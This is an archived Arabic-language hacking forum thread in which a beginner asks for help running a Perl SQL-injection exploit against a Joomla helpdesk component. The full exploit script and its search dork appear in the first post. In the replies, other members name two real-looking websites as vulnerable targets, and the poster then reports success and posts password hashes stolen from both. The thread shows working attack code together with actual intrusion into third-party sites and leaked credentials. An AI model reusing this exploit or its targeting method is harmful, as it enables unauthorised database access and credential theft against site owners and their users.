:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   [مشكلة] وصلت لمرحلة اليأس (http://www.vbspiders.com/vb/t65901.html)

Qroy hacker 11-26-2012 07:00 PM
وصلت لمرحلة اليأس
 
سلام عليكم ورحمة الله وبركاتة ..
كيف الحال ان شاء الله بخير

وصلت لمرحلة اليأس

بصراحة بديت بتعلم حقن قواعد بيانات sql
وتعلمت عليها جيداً
لكن دائماً تجيني مشاكل بها ، وهي عدم وجود لوحه تحكم بعض المواقع أحياناً يجي اخطاء غريبة
لاعرف لها حل
مثل ، لايطلع الجدول المطلوب
والخ من المشاكل :122:

قلت بشوف ثغرات سكربت جملا ، والورد بريس
بس للاسف ماعرفت لها ..
حاولت اترجم مافهمت كيف استغل

مثلا هاذي الثغرة

كود PHP:
#Exploit Title: Joomla Component com_huruhelpdesk Remote SQL Injection  #Google Dork: "inurl:option=com_huruhelpdesk"#Date: 04/10/2012#Exploit Author: D35m0nd142#Vendor Homepage: http://www.huruhelpdesk.net/#Tested on Joomla 1.5 #CVE: 2010-2907  #!/usr/bin/perlsystem("clear");print "***************************************\n";print " Joomla Component com_huruhelpdesk    *\n";print "      SQL Injection exploit           *\n";print "      Created by D35m0nd142           *\n";print "***************************************\n\n";use LWP::UserAgent;print "Target page [ex: http://www.site.com/dir] --> ";chomp(my $target=<STDIN> );$column_name="concat(username,0x3a,password,0x3a,mail)";$table_name="jos_users";$prm="-1/**/union/**/select/**/";$start= LWP::UserAgent->new() or die "[!] Error while processing";$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');$website=  $target .  "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";$ok= $start->request(HTTP::Request->new(GET=>$website));$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){print "[+] Password found --> $1\n\n";sleep 1;}else{print "No password found :(\n";}   # 1337day.com [2012-11-26] 
الي فهمته منها ادخل على الدوس
واكتب
cd..
cd..
نتحول لقرص الـc
من ثم
cd perl
وننتقل لـperl
ومن ثم cd bin
ومن ثم اروح للي حفظته بمجلد bin
وكمثال سميته kk.pl
اكتب kk.pl
يجي هكذا

كود PHP:
C:\Perl\bin>ksa.pl
'clear' is not recognized as an internal or external command,
operable program or batch file.
***************************************
 Joomla Component com_huruhelpdesk    *
      SQL Injection exploit           *
      Created by D35m0nd142           *
***************************************

Target page [exhttp://www.site.com/dir] --> 
الآن ماذا افعل ، :dunno:

طفشت بصراحة ولا مرة سويت شي صح

حتى الثغرات مافهم لها

المفترس 11-26-2012 08:04 PM
رد: وصلت لمرحلة اليأس
 
يلزمك target اي هدف تضعه مع اسم الملف هكدا ksa.pl target site وان لم يعمل فاعلم ان يوجد خطا في برمجة الملف او لم تنقله صح او ملف يعمل على نظام غير نظامك

ChucK NoRRis 11-26-2012 08:49 PM
رد: وصلت لمرحلة اليأس
 
يلزمك تضع رابط موقع مصاب
و الموقع المصاب تحصلو بالدورك المرفق مع الثغرة
كود:
inurl:"option=com_huruhelpdesk"
ولما تظغط انتر راح يقوم بالواجب و يجيبلك الباس بس مشفرة
وهاذم موقعين مصابين يمكن تجرب عليهم
كود:
http://www.rocktopia.co.uk/
http://www.itonwork.dk/

Qroy hacker 11-27-2012 12:12 AM
رد: وصلت لمرحلة اليأس
 
الله يعطيكم العافية يا أبطال وتم بحمدلله ..
معرفه كيف إستغلال الثغره ..
بالنسبة للمواقع الي طرحها اخوي ChucK NoRRis
هذا الهاش للموقع الاول
457c65286f6c682607136716b9fa8332
الموقع الثاني
4dba85486a30492103d1eb533f8a2e1f

ان شاء الله .. لاحتراف أكبر


الساعة الآن 03:43 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0